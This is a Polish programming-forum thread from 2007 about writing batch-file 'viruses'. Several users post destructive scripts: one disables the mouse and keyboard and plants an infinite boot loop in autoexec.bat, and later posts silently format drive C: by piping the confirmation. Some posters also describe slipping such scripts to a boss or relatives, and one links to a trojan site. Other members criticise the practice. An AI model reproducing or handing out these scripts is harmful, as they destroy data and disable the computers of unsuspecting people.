Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Jak zrobić wirusa *.bat
GMCLAN Forum > Kąciki programowania > Inne języki
Stron: 1, 2
Jedi_Master2
@echo off
rundll32 mouse,disable - powoduje wyłącznie myszki
rundll32 keyboard,disable - wyłącza klawiaturę
rundll32 krnl386.exe,exitkernel - zamykanie windowsa
echo :petla>>c:\autoexec.bat -nie dopuszczanie do startu systemu
echo goto petla>>c:\autoexec.bat - ____||____
start http://www.gmclan.org/ -owieranie strony
game maker.exe -uruchamianie pliku (wybierz własną nazwę)

kod należy skopiować do notatnika i zapisać w formacie bat (lub exe)
uwaga! jest to stary przykład robienia wirusów i wątpliwe, że zadziała w windowsie xp
Maximal
I po cholerę to tu dajesz? :/ Zresztą to nie wirus, tylko prosty program-żart.
Marmot
Nie lepiej zrobić wirusa który do autoexec.bat dopisuje kasowanie config.sys, albo w ogóle wirus kasujący config.sys xD ? To by był dopiero wirus, a nie taka zabawka ;p .
Vardi
CYTAT(Jedi_Master2 @ 27.01.2007 - 22:25) *
@echo off
rundll32 mouse,disable - powoduje wyłącznie myszki
rundll32 keyboard,disable - wyłącza klawiaturę
rundll32 krnl386.exe,exitkernel - zamykanie windowsa
echo :petla>>c:\autoexec.bat -nie dopuszczanie do startu systemu
echo goto petla>>c:\autoexec.bat - ____||____
start http://www.gmclan.org/ -owieranie strony
game maker.exe -uruchamianie pliku (wybierz własną nazwę)

kod należy skopiować do notatnika i zapisać w formacie bat (lub exe)
uwaga! jest to stary przykład robienia wirusów i wątpliwe, że zadziała w windowsie xp


Myślisz, że jak zapiszesz plik do exe to będzie działać ? O ile mi wiadomo to notatnik nie posiada kompilatora żadnego z języków.
Firemark
wogóle dużo antywirusów ma odkrycie kodu bat,js ,vb itp.
Jak ktoś grał w emulatora pinbala to wie co to jest mieć 100 alertów...
Zakol
CYTAT
Myślisz, że jak zapiszesz plik do exe to będzie działać ? O ile mi wiadomo to notatnik nie posiada kompilatora żadnego z języków.

Do *.bat i w wierszu poleceń.

Co do tematu to troche prymitywny wirus, już lepiej poszperać w *.ini i rejestrze.
Jedi_Master2
to tutaj macie koda do leprzego
@echo off
rundll32 user,disableoemlayer
rundll32 mouse,disable
rundll32 keyboard,disable
rundll32 user,swapmousebutton
rundll32 krnl386.exe,FatalExit
rundll32 user,SetDoubleClickTime
echo dir /s /v c:\*.* >>c:autoexec.bat
copy %windir%\help\*.* c:\windows\pulpit\*.txt >nul
rundll32 krnl386.exe,exitkernel
echo :petla>>c:\autoexec.bat
echo goto petla>>c:\autoexec.bat
start http://www.gmclan.org
game maker.exe
echo. >%windir%\pulpit\Tank 3d.exe
echo. >%windir%\pulpit\c3c.jpg
echo. >%windir%\pulpit\hwdp.png
echo. >%windir%\pulpit\gm.ink
echo. >%windir%\pulpit\dark maximal XD.???
echo. >%windir%\pulpitTank 3d.exe
echo. >%windir%\pulpit\c3c.jpg
echo. >%windir%\pulpit\hwdp.png
echo. >%windir%\pulpit\gm.ink
echo. >%windir%\pulpit\dark maximal XD.???
echo. >%windir%\pulpit\Tank 3d.exe
echo. >%windir%\pulpit\c3c.jpg
echo. >%windir%\pulpit\hwdp.png
echo. >%windir%\pulpit\gm.ink
echo. >%windir%\pulpit\dark maximal XD.???
echo. >%windir%\pulpitTank 3d.exe
echo. >%windir%\pulpit\c3c.jpg
echo. >%windir%\pulpit\hwdp.png
echo. >%windir%\pulpit\gm.ink
echo. >%windir%\pulpit\dark maximal XD.???
echo. >%windir%\pulpit\Tank 3d.exe
echo. >%windir%\pulpit\c3c.jpg
echo. >%windir%\pulpit\hwdp.png
echo. >%windir%\pulpit\gm.ink
echo. >%windir%\pulpit\dark maximal XD.???
echo. >%windir%\pulpit\Tank 3d.exe
echo. >%windir%\pulpit\c3c.jpg
echo. >%windir%\pulpit\hwdp.png
echo. >%windir%\pulpit\gm.ink
echo. >%windir%\pulpit\dark maximal XD.???
echo. >%windir%\pulpit\Tank 3d.exe
echo. >%windir%\pulpit\c3c.jpg
echo. >%windir%\pulpit\hwdp.png
echo. >%windir%\pulpit\gm.ink
echo. >%windir%\pulpit\dark maximal XD.???
echo. >%windir%\pulpit\Tank 3d.exe
echo. >%windir%\pulpit\c3c.jpg
echo. >%windir%\pulpit\hwdp.png
echo. >%windir%\pulpit\gm.ink
echo. >%windir%\pulpit\dark maximal XD.???
echo. >%windir%\pulpit\Tank 3d.exe
echo. >%windir%\pulpit\c3c.jpg
echo. >%windir%\pulpit\hwdp.png
echo. >%windir%\pulpit\gm.ink
echo. >%windir%\pulpit\dark maximal XD.???

a jak chcecie to tu jest strona z trojanem (też nie najleprzym, przykładowym) http://www.angryziber.com/r3c/ Pozatym to wszystko ma być przykładowe!
Cobra
To są chyba przykłady z jakiegoś tutoriala "jak pisać wirusy" albo coś podobnego, więc po co wycinasz po kawałku, zamiast dać całość?
Jedi_Master2
poprostu jak nie pasowało tamto to dałem to! sam dopisałem kawałek!
dziadekkleofas
A teraz pytanie - po co niszczyć komuś kompa wirusami? Nie umieta gier robić to teraz napluć do zupy niewinnemu, tak. Po za tym wszystkie antywirusy znają te sztuczki.
Jedi_Master2
fajnie! tylko to jest po to, by wiedzieć jak taki wirus powstaje! jak ktoś wie od podstaw jak zrobić wirusa, to tym lepiej potem wie, jak sie przed nim zabezpieczyć tongue2.gif . antywirus to nie wszystko.

PS. apropo nie umieta gier robić. Dlaczego wszyscy nie umieją gier robić? Czy to już jest zasada, że ja nic nie umiem i nic nie wiem i że trzeba ze mnie zrobić idiotę?
Globi
CYTAT(Jedi_Master2 @ 28.01.2007 - 16:20) *
Czy to już jest zasada, że ja nic nie umiem i nic nie wiem i że trzeba ze mnie zrobić idiotę?


Tak (joke)


A tak na serio to po jakiego grzyba tutaj to dajesz ? Myślisz że jesteś "wielki" bo żeś napisał coś bessensownego w bat ? Chłopie weź se na wstrzymanie i publikuj coś co sie przydać można, a nie do destrukcji służy, bo jaki z tego pożytek ? Zerowy! Komu bedzie sie chciało otwierać pliki *.bat w edytorze textu zanim je uruchomi ?
Ranmus
CYTAT(Jedi_Master2 @ 28.01.2007 - 16:20) *
fajnie! tylko to jest po to, by wiedzieć jak taki wirus powstaje! jak ktoś wie od podstaw jak zrobić wirusa, to tym lepiej potem wie, jak sie przed nim zabezpieczyć tongue2.gif . antywirus to nie wszystko.
Kurcze, ile razy można powtarzać, że to co dajesz, to NIE JEST wirus komputerowy tylko złośliwy skrypt. Tu masz definicję wirusa:
http://pl.wikipedia.org/wiki/Wirus_komputerowy
Firemark
Wogóle wiesz co sie robi z programistami wirusów emot11.gif
gajos
Mam pytanie a jak pozbyć sie takiego zrobionego wirusa np. który zablokuje ci klawiatur??smile.gif
Bartek (Kamrat)
montujesz partycje windowsową na linuksie i usuwasz gnoja smile2.gif
en_6280
Jedi_Master2 nie wiem czy wiesz ale ja wiem tongue.gif
te "komendy" w tych skryptach używane były już za czasów systemów ms-dos!!!!
Wiem to bo mam ksiązke(a raczej miałem dokiedy sie niezgubiła) o ms-dos z 1992 roku i zniej sie uczyłem kiedyś też pisania takich programów (no podobnych) emot11.gif
Dobrze że kombinujesz i zmieniasz troche skrypty i rozumiesz ich znaczenie thumbsup.gif

a czy zna ktoś program lub "emulattora" dos'a(ma czytac stare programi na dosa) przy właczonym xp
bo tak sie składa że napisałem prosty program a niemogo go otpalić(.bat) i sprawdzić czy działa mad.gif
więc jak ktos moze to niech sprawdzi oto skrypt:

@Echo off
if %1X==X goto pomoc
if %1X==? goto pomoc
if %2X==X goto pomoc
if not exist %1 goto berr
FIND /V "%2" %1 > TEMP.$$$
COPY TEMP.$$$ %1
ERASE TEMP.$$$
goto koniec
REM ----------
:berr
Echo Plik nie istnieje!
goto koniec
REM ----------
:pomoc
Echo Składnia polecenia jest następująca:
Echo WYKRESL {plik} {ciąg znaków}
Echo
Echo Wszystkie wiersze zawierające podany ciąg znaków
Echo będą usunięte z pliku.
Rem ----------
:koniec


ps.lepiej nie pisać wirusów bo można zaoto siedzieć tongue2.gif o ile fajniej pisać programy "żart" tongue2.gif
a i jeszcze Jedi_Master2 wiesz moze jak sie robi takie pionowe kreski w notatniku ale nie chodzi o i (pionowa kreska tak jak I ale bez tych daszków u góry i nadole) ????
Marmot
CYTAT
a czy zna ktoś program lub "emulattora" dos'a(ma czytac stare programi na dosa) przy właczonym xp

Dosbox
CYTAT
a i jeszcze Jedi_Master2 wiesz moze jak sie robi takie pionowe kreski w notatniku ale nie chodzi o i (pionowa kreska tak jak I ale bez tych daszków u góry i nadole) ????

Masz na myśli: "|" ? Przycisk z tym jest razem z backslash, a jak coś, to możesz poszukać w tablicy znaków Windowsa.
en_6280
Dzx a dosbox ma troche trudną obsługę ale sobie radze biggrin.gif
jak na xp próbuje otworzyć ten twój "wirus" to mam napisane illegal coś tam
spyro
@up A co, myślałeś, że to legalne ?! =P

Chłeps, wdług mnie, to takie 'programiki' nie są tak szkodliwe, ażeby od razu tutaj je poniżać, ale są o tyle przydatne, by na przykład podrzucić takie cóś zuemu koledze, albo zdenerwować tatę (jak mi to kiedyś uczyniono xP). Sam czasem piszę takie złośliwe skrypty i podsyłam w mailach z raportami do szefa, a on się później przyczepia "A czemu to znowu mi wszystkie ikonki z pul[pitu znikły?!" xD Heh, no i oczywiście jak zawsze ja bohatersko ratuję mu później pulpit, kasując skrypt.

Oczywiście osobiście nie jestem za pisaniem takich wirusów, albo skryptów, ale jak najbardziej za nauką działania takich śmieci i uczenia się na własnej skórze i błędach, w każdym znaczeniu tych słów. xD
en_6280
moim zdaniem to lepiej pisać takie "wirusy" w c++ lub pascalu bo tak to na xp Nieidzie ich odczytać (uruchomić) a moim zdaniem, niewiem jak waszym, "wirus" powinien być universalny!!!!!!!!!!!!
blackmaul
CYTAT(en_6280 @ 5.02.2007 - 10:01) *
moim zdaniem to lepiej pisać takie "wirusy" w c++ lub pascalu bo tak to na xp Nieidzie ich odczytać

Taa, Pascal to stary crap którego już się nie używa smile2.gif
Marmot
CYTAT
Taa, Pascal to stary crap którego już się nie używa smile2.gif

Spier... xd

I tak, wirusy lepiej w assemblerze pisać ^^ .
Tymon
Lol, wpisz se format c: i masz wirusa... ludzie. tongue2.gif Każdy kretyn może sobie coś takiego napisać i nazwać to "wirusem".

Btw. Niektórzy nie widzą różnicy między programem, a wirusem. Prosty przykład: odpaliłem sobie shutdown na 10s, podchodzi kumpel i mówi "złapałeś jakiegoś wirusa". xD
en_6280
co do formata to go trzeba najpierw potwierdzić biggrin.gif ale można napisąc prosto skrypt żeby zawsze odpowiedź brzmiała tak biggrin.gif
Tymon
KOD
@echo off
format c: /q /x
t
y
cls
echo Cya! xD
Huh? o_O.
en_6280
hehe biggrin.gif nietrafiłeś biggrin.gif tak to niedziała trzeba inaczej tongue2.gif ale kombinuj dalej
Tymon
A idziesz się założyć? ;] Rusz to pod DOSem.

W sumie na nowszych Windowsach też się da:
KOD
@echo off
echo t | format c:
cls
echo Cya! xD
en_6280
Pod dosem to nieuruchomne ba mam xp tongue2.gif a przez emulatora niedziała ten przykład tongue2.gif jak działa pod dosem to zwracam honory tongue2.gif
Tymon
Działa, działa. Czasy kiedy klepało się pod DOSem dawno minęły - ale to tym jak się powinno pisać nie da rady zapomnieć smile.gif
en_6280
fajna jest komenda unformat szczególnie jak kupuje sie dysk z komisu biggrin.gif wielu rzeczy można sie często dowiedzieć tongue2.gif
Marmot
Unformat? Pierwsze słyszę ;p . Czasem nie miałeś na myśli Undelete? Bo może się mylę ;p .
Vardi
http://www.computerhope.com/unformat.htm

Chyba jednak jest coś takiego jak unformat.
Bruce
Czy te "lamy" nie mają co robić ?
ps. Zrób sobie wirusa w kuchni smile.gif
en_6280
CYTAT
Unformat? Pierwsze słyszę ;p . Czasem nie miałeś na myśli Undelete? Bo może się mylę ;p .


UNFORMAT Odzyskanie zawartości dysku po sformatowaniu
jest to polecenie zewnętrzne

składnia:
UNFORMAT a:[/J]
lub
UNFORMAT a:[/U] [/L] [/TEST] [/p]
lub
UNFORMAT /PARTN [/L] [/P]
gdzie d: jest nazwą dysku, którego zawartość ma być odzyskana
Dopuszczalne są następujące opcje:
/J Sprawdza zgodność informacji zapisanych na dysku i utworzonych przez program MIRROR.
/U Odzyskuje zawartość dysku bez korzystania z informacji zapisanych przez polecenie MIRROR.
/L Pokazuje listę katalogów na dysku.
/TEST Symuluje proces odzyskiwania, wyświetlajać informacje o jego przebiegu.
/P Kieruje informacje o przebiegu procesu na drukarkę.
/PARTN Odtwarza tablice partycji dysku.

Proces przebiega następująco: jeśli dyskietka zawiera juz jakies dane,to zawartość sektorów systemowych (to jest tych sektorów początkowych dyskietiki, które są zarezerwowane dla systemu ) jest zapamiętywana w tym miejscu dyskietki, gdzie nieulegną zniszczeniu przy formatowaniu. Po wykonaniu operacji formatowania nalezy wywołać polecenie UNFORMAT, które-jeśli to będzie możliwe-odtworzy zawartosć sektorów systemowych dyskietki na podstawie zapamiętanego ich obrazu.
Oczywiście, że ta operacja nie gwarantuje pełnego odzyskania całej zawartości dyskietki, szczególnie jeśli coś do niej dopisywano między operacją formatowania a operacją odzyskiwania.

ps. działa na 100% pod dosem thumbsup.gif napisałem to aby wam to udowodnić ze istnieje i przybliżyć to wam bardziej cool.gif (dla tych co nieznaja angielskiego )
Marmot
Już przeczytałem to wcześniej ze strony od Vardiego ;p .
Shylios
omG
I na uja będziesz robił wirusy?
Bawi cie niszczenie czyjejś pracy lub dokuczanie komuś?
Niech ja cie na RL tylko złapie... xD

A po drugie ja mam zonealarm pro więc mi taki wirus uja zrobi biggrin.gif
LittleFish
ja znam lepszy sposob na zrobienie wirusa w *.bat; echo wpisz w oknie polecenia "format C:/" - polowa uzytkownikow gmclanu napewno sie nabierze na zarcik.
Raptile
mam pytanie... zrobilem plik bat i zapisalem w nim info zeby mi zrobil na pulpicie pliki (XXX). niestety kiedy go uruchamiam to na pulpicie nie tworza sie zadne pliki:( Dlaczego????
dziadekkleofas
Może tworzy je gdzie indziej? Czasami się to zdarza przez literówki. emot11.gif
Raptile
a gdzie by mogl je tworzyc?
Floodnik
Ja też mam mały problem smile.gif Nie znam żadnej komendy na tworzenie plików, jedynie na tworzenie katalogów... Jest taka w ogóle i jeśli tak, to jak się nazywa? I co zrobić żeby nie trzeba było czegoś potwierdzać, tylko robiło się od razu?

hihihi...
Raptile
oto sa moje wiersze w pliku:

@echo off
echo. >%windir%\pulpit\pozycje
echo. >%windir%\pulpit\pamela
echo. >%windir%\pulpit\kamasutra
echo. >%windir%\pulpit\cycuszki

dobrze to zrobilem?
Floodnik
Może po prostu dlatego, że nie dałeś rozszerzeń? A jeśli chcesz zrobić katalogi, to komenda MD nazwafoldera, np. MD lol.

@down

Chyba nie ma takiej komendy... Bo nawet jeśli byś stworzył plik, to był by pusty...
Raptile
dzieki... wlasnie tez znalazlem jak zrobic folder:) ta sama komenda >D thx

a wiesz jaka komenda tworzy pliki?

tak bedzie pusty ale chyba jest taka komenda


http://afro.damnedangels.net/pub/HBF/hackerwanabe3.0.txt to jest fajna stronka o hakingu i wlamywaniu sie.... tu jest wiele komend w punkcie 6.1 jak bedziesz chcial go poszukac to poprzez ctrl+f
Marmot
Od tworzenia plików jest:
copy con nazwapliku
Raptile
thx

wpisalem to copy con pliczek ale jak otwieram plik.bat to nierobi sie ten pliczek tylko otwiera sie okno komend i musze tam osobno wpisywac copy con pliczek.... czy musialbym cos dopisac albo zmienic? jasli tak to prosze o podpowiedz

marmot. jak wstawiles sobie te obrazki przy nazwie i pod textem?
blink.gif

Nie pisz dwóch postów pod rząd smile2.gif . A jak chcesz mieć obrazki, to wejdź w Panel kontrolny i poszukaj tam edycji avatara oraz sygnatury.
Marmot
Raptile
ja napisalem 1 sygnature:
@echo off
copy con naga_laska

sorry chcialem napisac:
ja napisalem 1 post:
@echo off
copy con naga_laska


smile.gifsmile.gifsmile.gifsmile.gif sp_ike.gif
Floodnik
xD
NIE PISZ DWÓCH POSTÓW POD RZĄD!!

Gdzie rozszerzenie?
Raptile
jakich postow??? a format to ja mam w pliku. o format sie niemartw:) tylko powiedz mi o co z tymi postami chodzi..... ok?
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2014 Invision Power Services, Inc.